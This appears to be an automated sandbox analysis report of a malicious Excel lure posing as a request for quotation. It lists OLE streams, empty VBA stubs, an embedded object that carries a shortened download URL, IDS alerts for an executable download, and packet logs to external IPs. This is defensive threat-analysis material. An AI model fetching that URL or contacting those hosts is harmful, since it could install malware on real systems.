                SHA512:f5d05bf90c16712dbfaa5b02427236825d0ea138b521203503835879a2c5252dc6a8801cb729b3775ff48e527799d7fe474d6e38c5f46d2f4643e345958dc46a
                SSDEEP:24576:yZwsLEh7JvrW42STzLAUHfEorjb49pKdKGmkskhop:yysK7VW42SHsU/EorAHUZop
                TLSH:6235236AB6D58F4BD60A9F3848E783632265FC81BE94C70B1244F72D6E35EF1064352E
                File Content Preview:........................>...................................d...................................................g.......h.......j.......l.......n..............................................................................................................

                File Icon

                Icon Hash:276ea3a6a6b7bfbf

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "RFQ#51281AOLAI.xls"

                Indicators
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Summary
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-07-26 01:51:49
                Creating Application:Microsoft Excel
                Security:1
                Document Summary
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432

                Streams with VBA

                VBA File Name: Sheet1.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 a8 08 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet2.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 ba 3c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet3.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T 4 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 34 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 1d 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.282068105701866
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ( ` . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: MBD001BDE15/\x1CompObj, File Type: data, Stream Size: 99
                General
                Stream Path:MBD001BDE15/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD001BDE15/Package, File Type: Microsoft Excel 2007+, Stream Size: 569795
                General
                Stream Path:MBD001BDE15/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:569795
                Entropy:7.972309072920344
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD001BDE16/\x1Ole, File Type: data, Stream Size: 352
                General
                Stream Path:MBD001BDE16/\x1Ole
                CLSID:
                File Type:data
                Stream Size:352
                Entropy:6.486914378277046
                Base64 Encoded:False
                Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . d . G . a . . . . 0 o Y . ' q N . 5 . . . 8 , 2 . K ) N % v . . . @ k z . 3 8 R 7 g . I + P M - . $ . P ( P . . . j h " K . t . . 7 i w . g > A ; c . ] , h . ' s ] . J b - \\ V = j b . * V . H $ { ! . n + % w - e j } P s G } M } . . Q . ~ i " . . . . . . . . . . . . . . . . . . . . Z . b . u . 0 . E . . . E v . 3 ( k ^ | z . E . ` \\ M
                Data Raw:01 00 00 02 f5 7f a1 1b 12 aa 06 73 00 00 00 00 00 00 00 00 00 00 00 00 f4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f0 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 64 00 47 00 61 00 00 00 d9 1b 30 6f 59 1d 27 71 4e bd 84 1d ff 35 a4 96 aa 1f f4 00 c2 bd 38 c8 2c 32 c8 dd 7f c8 ce ed 4b 29 8a b2 4e a6 8e 25 c0 76
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 562218
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:562218
                Entropy:7.939791916762211
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . .
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:523
                Entropy:5.211133089273723
                Base64 Encoded:True
                Data ASCII:I D = " { 4 A C A F 9 D F - 9 D 0 6 - 4 9 C C - 9 4 8 2 - 0 2 6 2 8 1 5 2 3 1 F D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 2 6 0 8 1 1 3 D 5 1 7 D 5 1 7 D
                Data Raw:49 44 3d 22 7b 34 41 43 41 46 39 44 46 2d 39 44 30 36 2d 34 39 43 43 2d 39 34 38 32 2d 30 32 36 32 38 31 35 32 33 31 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:4.005444285593956
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.371567531783539
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 92 f7 b3 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                2024-07-26T11:07:21.237346+0200TCP2022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M18049166104.219.239.104192.168.2.22
                2024-07-26T11:07:21.335839+0200TCP2022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M28049166104.219.239.104192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 11:07:10.911835909 CEST4916180192.168.2.22188.114.96.3
                Jul 26, 2024 11:07:10.916825056 CEST8049161188.114.96.3192.168.2.22
                Jul 26, 2024 11:07:10.916902065 CEST4916180192.168.2.22188.114.96.3
                Jul 26, 2024 11:07:10.917006969 CEST4916180192.168.2.22188.114.96.3
                Jul 26, 2024 11:07:10.921870947 CEST8049161188.114.96.3192.168.2.22
                Jul 26, 2024 11:07:12.072160959 CEST8049161188.114.96.3192.168.2.22
                Jul 26, 2024 11:07:12.072442055 CEST4916180192.168.2.22188.114.96.3
                Jul 26, 2024 11:07:12.079615116 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.085028887 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.085216045 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.085287094 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.090147018 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645530939 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645581007 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645610094 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.645618916 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645653963 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645689011 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.645689964 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.645715952 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.645941973 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645976067 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.645994902 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.646009922 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.646022081 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.646047115 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.646064043 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.646100998 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.646476984 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.646514893 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.646542072 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.646564960 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.650794029 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.650830984 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.650867939 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.650899887 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.651724100 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.739213943 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.739341974 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.739377022 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.739398003 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.739455938 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.739455938 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.739531040 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.739589930 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.744083881 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.744119883 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.744151115 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.744182110 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.744237900 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.744288921 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.744386911 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.744441986 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.748809099 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.748842955 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.748871088 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.748876095 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.748887062 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.748934031 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.749142885 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.749177933 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.749197960 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.749228954 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.753673077 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.753707886 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.753748894 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.753750086 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.754076004 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.754111052 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.754128933 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.754160881 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.758445024 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.758480072 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.758497953 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.758514881 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.758532047 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.758574963 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.758835077 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.758869886 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.758898020 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.758924007 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.832611084 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.832720995 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.832756042 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.832772017 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.832772017 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.832853079 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.832937002 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.832994938 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.837548018 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.837580919 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.837605953 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.837634087 CEST4916280192.168.2.22104.219.239.104
                Jul 26, 2024 11:07:12.837663889 CEST8049162104.219.239.104192.168.2.22
                Jul 26, 2024 11:07:12.837697983 CEST8049162104.219.239.104192.168.2.22
